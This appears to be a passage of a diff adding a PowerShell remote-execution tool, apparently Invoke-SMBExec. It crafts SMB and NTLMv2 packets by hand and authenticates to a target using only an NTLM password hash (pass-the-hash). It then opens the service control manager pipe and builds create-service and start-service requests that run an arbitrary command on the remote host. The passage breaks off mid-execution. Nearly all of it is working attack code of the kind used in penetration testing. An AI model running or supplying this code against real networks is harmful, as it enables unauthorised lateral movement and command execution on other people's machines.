+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length)
+ [Byte[]]$packet_frag_length = $packet_write_length[0,1]
+ [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length)
+ [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)
+ $packet_auth_length = $packet_auth_length[0,1]
+
+ $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_RPCRequest.Add("Version",[Byte[]](0x05))
+ $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00))
+ $packet_RPCRequest.Add("PacketType",[Byte[]](0x00))
+ $packet_RPCRequest.Add("PacketFlags",$packet_flags)
+ $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_RPCRequest.Add("FragLength",$packet_frag_length)
+ $packet_RPCRequest.Add("AuthLength",$packet_auth_length)
+ $packet_RPCRequest.Add("CallID",$packet_call_ID)
+ $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint)
+ $packet_RPCRequest.Add("ContextID",$packet_context_ID)
+ $packet_RPCRequest.Add("Opnum",$packet_opnum)
+
+ if($packet_data.Length)
+ {
+ $packet_RPCRequest.Add("Data",$packet_data)
+ }
+
+ return $packet_RPCRequest
+}
+
+#SCM
+
+function New-PacketSCMOpenSCManagerW
+{
+ param ([Byte[]]$packet_service,[Byte[]]$packet_service_length)
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service.Length + 92)
+ [Byte[]]$packet_frag_length = $packet_write_length[0,1]
+ [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service.Length + 68)
+ $packet_referent_ID1 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID1 = $packet_referent_ID1.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID1 += 0x00,0x00
+ $packet_referent_ID2 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID2 = $packet_referent_ID2.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID2 += 0x00,0x00
+
+ $packet_SCMOpenSCManagerW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMOpenSCManagerW.Add("MachineName_ReferentID",$packet_referent_ID1)
+ $packet_SCMOpenSCManagerW.Add("MachineName_MaxCount",$packet_service_length)
+ $packet_SCMOpenSCManagerW.Add("MachineName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("MachineName_ActualCount",$packet_service_length)
+ $packet_SCMOpenSCManagerW.Add("MachineName",$packet_service)
+ $packet_SCMOpenSCManagerW.Add("Database_ReferentID",$packet_referent_ID2)
+ $packet_SCMOpenSCManagerW.Add("Database_NameMaxCount",[Byte[]](0x0f,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Database_NameOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Database_NameActualCount",[Byte[]](0x0f,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Database",[Byte[]](0x53,0x00,0x65,0x00,0x72,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,0x73,0x00,0x41,0x00,0x63,0x00,0x74,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x00,0x00))
+ $packet_SCMOpenSCManagerW.Add("Unknown",[Byte[]](0xbf,0xbf))
+ $packet_SCMOpenSCManagerW.Add("AccessMask",[Byte[]](0x3f,0x00,0x00,0x00))
+
+ return $packet_SCMOpenSCManagerW
+}
+
+function New-PacketSCMCreateServiceW
+{
+ param([Byte[]]$packet_context_handle,[Byte[]]$packet_service,[Byte[]]$packet_service_length,
+ [Byte[]]$packet_command,[Byte[]]$packet_command_length)
+
+ $packet_referent_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $packet_referent_ID = $packet_referent_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $packet_referent_ID += 0x00,0x00
+
+ $packet_SCMCreateServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMCreateServiceW.Add("ContextHandle",$packet_context_handle)
+ $packet_SCMCreateServiceW.Add("ServiceName_MaxCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("ServiceName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceName_ActualCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("ServiceName",$packet_service)
+ $packet_SCMCreateServiceW.Add("DisplayName_ReferentID",$packet_referent_ID)
+ $packet_SCMCreateServiceW.Add("DisplayName_MaxCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("DisplayName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("DisplayName_ActualCount",$packet_service_length)
+ $packet_SCMCreateServiceW.Add("DisplayName",$packet_service)
+ $packet_SCMCreateServiceW.Add("AccessMask",[Byte[]](0xff,0x01,0x0f,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceType",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceStartType",[Byte[]](0x03,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("ServiceErrorControl",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("BinaryPathName_MaxCount",$packet_command_length)
+ $packet_SCMCreateServiceW.Add("BinaryPathName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("BinaryPathName_ActualCount",$packet_command_length)
+ $packet_SCMCreateServiceW.Add("BinaryPathName",$packet_command)
+ $packet_SCMCreateServiceW.Add("NULLPointer",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("TagID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("NULLPointer2",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("DependSize",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("NULLPointer3",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("NULLPointer4",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("PasswordSize",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $packet_SCMCreateServiceW
+}
+
+function New-PacketSCMStartServiceW
+{
+ param([Byte[]]$packet_context_handle)
+
+ $packet_SCMStartServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMStartServiceW.Add("ContextHandle",$packet_context_handle)
+ $packet_SCMStartServiceW.Add("Unknown",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $packet_SCMStartServiceW
+}
+
+function New-PacketSCMDeleteServiceW
+{
+ param([Byte[]]$packet_context_handle)
+
+ $packet_SCMDeleteServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCMDeleteServiceW.Add("ContextHandle",$packet_context_handle)
+
+ return $packet_SCMDeleteServiceW
+}
+
+function New-PacketSCMCloseServiceHandle
+{
+ param([Byte[]]$packet_context_handle)
+
+ $packet_SCM_CloseServiceW = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SCM_CloseServiceW.Add("ContextHandle",$packet_context_handle)
+
+ return $packet_SCM_CloseServiceW
+}
+
+function DataLength2
+{
+ param ([Int]$length_start,[Byte[]]$string_extract_data)
+
+ $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
+
+ return $string_length
+}
+
+if($hash -like "*:*")
+{
+ $hash = $hash.SubString(($hash.IndexOf(":") + 1),32)
+}
+
+if($Domain)
+{
+ $output_username = $Domain + "\" + $Username
+}
+else
+{
+ $output_username = $Username
+}
+
+[String]$session_string = $session
+
+if($session_string)
+{
+
+ if(!$Inveigh -or !$inveigh.session_socket_table[$session])
+ {
+ Write-Output "[-] Inveigh Relay session not found"
+ $startup_error = $true
+ }
+ elseif(!$inveigh.session_socket_table[$session].Connected)
+ {
+ Write-Output "[-] Inveigh Relay session not connected"
+ $startup_error = $true
+ }
+
+ $Target = $inveigh.session_socket_table[$session].Client.RemoteEndpoint.Address.IPaddressToString
+}
+
+$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
+$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
+$process_ID = $process_ID -replace "-00-00",""
+[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+if(!$session_string)
+{
+ $SMB_client = New-Object System.Net.Sockets.TCPClient
+ $SMB_client.Client.ReceiveTimeout = 60000
+}
+
+if(!$startup_error -and !$session_string)
+{
+
+ try
+ {
+ $SMB_client.Connect($Target,"445")
+ }
+ catch
+ {
+ Write-Output "$Target did not respond"
+ }
+
+}
+
+if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table[$session].Connected))
+{
+ $SMB_client_receive = New-Object System.Byte[] 1024
+
+ if(!$session_string)
+ {
+ $SMB_client_stream = $SMB_client.GetStream()
+ $SMB_client_stage = 'NegotiateSMB'
+
+ while($SMB_client_stage -ne 'exit')
+ {
+
+ switch ($SMB_client_stage)
+ {
+
+ 'NegotiateSMB'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID_bytes 0x00,0x00
+ $packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq 'ff-53-4d-42')
+ {
+ $SMB_version = 'SMB1'
+ $SMB_client_stage = 'NTLMSSPNegotiate'
+
+ if([System.BitConverter]::ToString($SMB_client_receive[39]) -eq '0f')
+ {
+
+ if($SigningCheck)
+ {
+ Write-Output "SMB signing is required"
+ $SMB_client_stage = 'exit'
+ }
+ else
+ {
+ Write-Verbose "SMB signing is required"
+ $SMB_signing = $true
+ $SMB_session_key_length = 0x00,0x00
+ $SMB_negotiate_flags = 0x15,0x82,0x08,0xa0
+ }
+
+ }
+ else
+ {
+
+ if($SigningCheck)
+ {
+ Write-Output "SMB signing is not required"
+ $SMB_client_stage = 'exit'
+ }
+ else
+ {
+ $SMB_signing = $false
+ $SMB_session_key_length = 0x00,0x00
+ $SMB_negotiate_flags = 0x05,0x82,0x08,0xa0
+ }
+
+ }
+
+ }
+ else
+ {
+ $SMB_client_stage = 'NegotiateSMB2'
+
+ if([System.BitConverter]::ToString($SMB_client_receive[70]) -eq '03')
+ {
+
+ if($SigningCheck)
+ {
+ Write-Output "SMB signing is required"
+ $SMB_client_stage = 'exit'
+ }
+ else
+ {
+ Write-Verbose "SMB signing is required"
+ $SMB_signing = $true
+ $SMB_session_key_length = 0x00,0x00
+ $SMB_negotiate_flags = 0x15,0x82,0x08,0xa0
+ }
+
+ }
+ else
+ {
+
+ if($SigningCheck)
+ {
+ Write-Output "SMB signing is not required"
+ $SMB_client_stage = 'exit'
+ }
+ else
+ {
+ $SMB_signing = $false
+ $SMB_session_key_length = 0x00,0x00
+ $SMB_negotiate_flags = 0x05,0x80,0x08,0xa0
+ }
+
+ }
+
+ }
+
+ }
+
+ 'NegotiateSMB2'
+ {
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $SMB2_message_ID = 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'NTLMSSPNegotiate'
+ }
+
+ 'NTLMSSPNegotiate'
+ {
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x07,0xc8 0xff,0xff $process_ID_bytes 0x00,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ }
+
+ $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $SMB_negotiate_flags
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
+ $packet_SMB_data = New-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ }
+ else
+ {
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $SMB_negotiate_flags
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
+ $packet_SMB2_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_negotiate
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ }
+
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'exit'
+ }
+
+ }
+
+ }
+
+ if(!$SigningCheck)
+ {
+ $SMB_NTLMSSP = [System.BitConverter]::ToString($SMB_client_receive)
+ $SMB_NTLMSSP = $SMB_NTLMSSP -replace "-",""
+ $SMB_NTLMSSP_index = $SMB_NTLMSSP.IndexOf("4E544C4D53535000")
+ $SMB_NTLMSSP_bytes_index = $SMB_NTLMSSP_index / 2
+ $SMB_domain_length = DataLength2 ($SMB_NTLMSSP_bytes_index + 12) $SMB_client_receive
+ $SMB_target_length = DataLength2 ($SMB_NTLMSSP_bytes_index + 40) $SMB_client_receive
+ $SMB_session_ID = $SMB_client_receive[44..51]
+ $SMB_NTLM_challenge = $SMB_client_receive[($SMB_NTLMSSP_bytes_index + 24)..($SMB_NTLMSSP_bytes_index + 31)]
+ $SMB_target_details = $SMB_client_receive[($SMB_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
+ $SMB_target_time_bytes = $SMB_target_details[($SMB_target_details.Length - 12)..($SMB_target_details.Length - 5)]
+ $NTLM_hash_bytes = (&{for ($i = 0;$i -lt $hash.Length;$i += 2){$hash.SubString($i,2)}}) -join "-"
+ $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $auth_hostname = (Get-ChildItem -path env:computername).Value
+ $auth_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($auth_hostname)
+ $auth_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($Domain)
+ $auth_username_bytes = [System.Text.Encoding]::Unicode.GetBytes($username)
+ $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length)
+ $auth_domain_length = $auth_domain_length[0,1]
+ $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length)
+ $auth_domain_length = $auth_domain_length[0,1]
+ $auth_username_length = [System.BitConverter]::GetBytes($auth_username_bytes.Length)
+ $auth_username_length = $auth_username_length[0,1]
+ $auth_hostname_length = [System.BitConverter]::GetBytes($auth_hostname_bytes.Length)
+ $auth_hostname_length = $auth_hostname_length[0,1]
+ $auth_domain_offset = 0x40,0x00,0x00,0x00
+ $auth_username_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + 64)
+ $auth_hostname_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + 64)
+ $auth_LM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 64)
+ $auth_NTLM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 88)
+ $HMAC_MD5 = New-Object System.Security.Cryptography.HMACMD5
+ $HMAC_MD5.key = $NTLM_hash_bytes
+ $username_and_target = $username.ToUpper()
+ $username_and_target_bytes = [System.Text.Encoding]::Unicode.GetBytes($username_and_target)
+ $username_and_target_bytes += $auth_domain_bytes
+ $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes)
+ $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $client_challenge_bytes = $client_challenge.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ $security_blob_bytes = 0x01,0x01,0x00,0x00,
+ 0x00,0x00,0x00,0x00 +
+ $SMB_target_time_bytes +
+ $client_challenge_bytes +
+ 0x00,0x00,0x00,0x00 +
+ $SMB_target_details +
+ 0x00,0x00,0x00,0x00,
+ 0x00,0x00,0x00,0x00
+
+ $server_challenge_and_security_blob_bytes = $SMB_NTLM_challenge + $security_blob_bytes
+ $HMAC_MD5.key = $NTLMv2_hash
+ $NTLMv2_response = $HMAC_MD5.ComputeHash($server_challenge_and_security_blob_bytes)
+
+ if($SMB_signing)
+ {
+ $session_base_key = $HMAC_MD5.ComputeHash($NTLMv2_response)
+ $session_key = $session_base_key
+ $HMAC_SHA256 = New-Object System.Security.Cryptography.HMACSHA256
+ $HMAC_SHA256.key = $session_key
+ }
+
+ $NTLMv2_response = $NTLMv2_response + $security_blob_bytes
+ $NTLMv2_response_length = [System.BitConverter]::GetBytes($NTLMv2_response.Length)
+ $NTLMv2_response_length = $NTLMv2_response_length[0,1]
+ $SMB_session_key_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + $NTLMv2_response.Length + 88)
+
+ $NTLMSSP_response = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,
+ 0x03,0x00,0x00,0x00,
+ 0x18,0x00,
+ 0x18,0x00 +
+ $auth_LM_offset +
+ $NTLMv2_response_length +
+ $NTLMv2_response_length +
+ $auth_NTLM_offset +
+ $auth_domain_length +
+ $auth_domain_length +
+ $auth_domain_offset +
+ $auth_username_length +
+ $auth_username_length +
+ $auth_username_offset +
+ $auth_hostname_length +
+ $auth_hostname_length +
+ $auth_hostname_offset +
+ $SMB_session_key_length +
+ $SMB_session_key_length +
+ $SMB_session_key_offset +
+ $SMB_negotiate_flags +
+ $auth_domain_bytes +
+ $auth_username_bytes +
+ $auth_hostname_bytes +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $NTLMv2_response
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $SMB_user_ID = $SMB_client_receive[32,33]
+ $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x07,0xc8 0xff,0xff $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ }
+
+ $packet_SMB_header["UserID"] = $SMB_user_ID
+ $packet_NTLMSSP_negotiate = New-PacketNTLMSSPAuth $NTLMSSP_response
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
+ $packet_SMB_data = New-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ }
+ else
+ {
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $NTLMSSP_response
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
+ $packet_SMB2_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_auth
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ }
+
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_version -eq 'SMB1')
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[9..12]) -eq '00-00-00-00')
+ {
+ Write-Verbose "$output_username successfully authenticated on $Target"
+ $login_successful = $true
+ }
+ else
+ {
+ Write-Output "$output_username failed to authenticate on $Target"
+ $login_successful = $false
+ }
+
+ }
+ else
+ {
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -eq '00-00-00-00')
+ {
+ Write-Verbose "$output_username successfully authenticated on $Target"
+ $login_successful = $true
+ }
+ else
+ {
+ Write-Output "$output_username failed to authenticate on $Target"
+ $login_successful = $false
+ }
+
+ }
+
+ }
+
+ }
+
+ if($login_successful -or $session_string)
+ {
+
+ if($session_string)
+ {
+
+ if($session_string -and $inveigh.session_lock_table[$session] -eq 'locked')
+ {
+ Write-Output "[*] Pausing due to Inveigh Relay session lock"
+ Start-Sleep -s 2
+ }
+
+ $inveigh.session_lock_table[$session] = 'locked'
+ $SMB_client = $inveigh.session_socket_table[$session]
+ $SMB_client_stream = $SMB_client.GetStream()
+ $SMB_session_ID = $inveigh.session_table[$session]
+ $SMB2_message_ID = $inveigh.session_message_ID_table[$session]
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ }
+
+ $SMB_path = "\\" + $Target + "\IPC$"
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $SMB_path_bytes = [System.Text.Encoding]::UTF8.GetBytes($SMB_path) + 0x00
+ }
+ else
+ {
+ $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
+ }
+
+ $SMB_named_pipe_UUID = 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,0x00,0x10,0x03
+
+ if(!$Service)
+ {
+ $SMB_service_random = [String]::Join("00-",(1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
+ $SMB_service = $SMB_service_random -replace "-00",""
+ $SMB_service = $SMB_service.Substring(0,$SMB_service.Length - 1)
+ $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length)
+ $SMB_service_random += '00-00-00-00-00'
+ $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ }
+ else
+ {
+ $SMB_service = $Service
+ $SMB_service_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_service)
+
+ if([Bool]($SMB_service.Length % 2))
+ {
+ $SMB_service_bytes += 0x00,0x00
+ }
+ else
+ {
+ $SMB_service_bytes += 0x00,0x00,0x00,0x00
+
+ }
+
+ }
+
+ $SMB_service_length = [System.BitConverter]::GetBytes($SMB_service.Length + 1)
+
+ if($CommandCOMSPEC -eq 'Y')
+ {
+ $Command = "%COMSPEC% /C `"" + $Command + "`""
+ }
+ else
+ {
+ $Command = "`"" + $Command + "`""
+ }
+
+ [System.Text.Encoding]::UTF8.GetBytes($Command) | ForEach-Object{$SMBExec_command += "{0:X2}-00-" -f $_}
+
+ if([Bool]($Command.Length % 2))
+ {
+ $SMBExec_command += '00-00'
+ }
+ else
+ {
+ $SMBExec_command += '00-00-00-00'
+ }
+
+ $SMBExec_command_bytes = $SMBExec_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $SMBExec_command_length_bytes = [System.BitConverter]::GetBytes($SMBExec_command_bytes.Length / 2)
+ $SMB_split_index = 4256
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $SMB_client_stage = 'TreeConnectAndXRequest'
+
+ :SMB_execute_loop while ($SMB_client_stage -ne 'exit')
+ {
+
+ switch ($SMB_client_stage)
+ {
+
+ 'TreeConnectAndXRequest'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $MD5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBTreeConnectAndXRequest $SMB_path_bytes
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'CreateAndXRequest'
+ }
+
+ 'CreateAndXRequest'
+ {
+ $SMB_named_pipe_bytes = 0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 # \svcctl
+ $SMB_tree_ID = $SMB_client_receive[28,29]
+ $packet_SMB_header = New-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBNTCreateAndXRequest $SMB_named_pipe_bytes
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
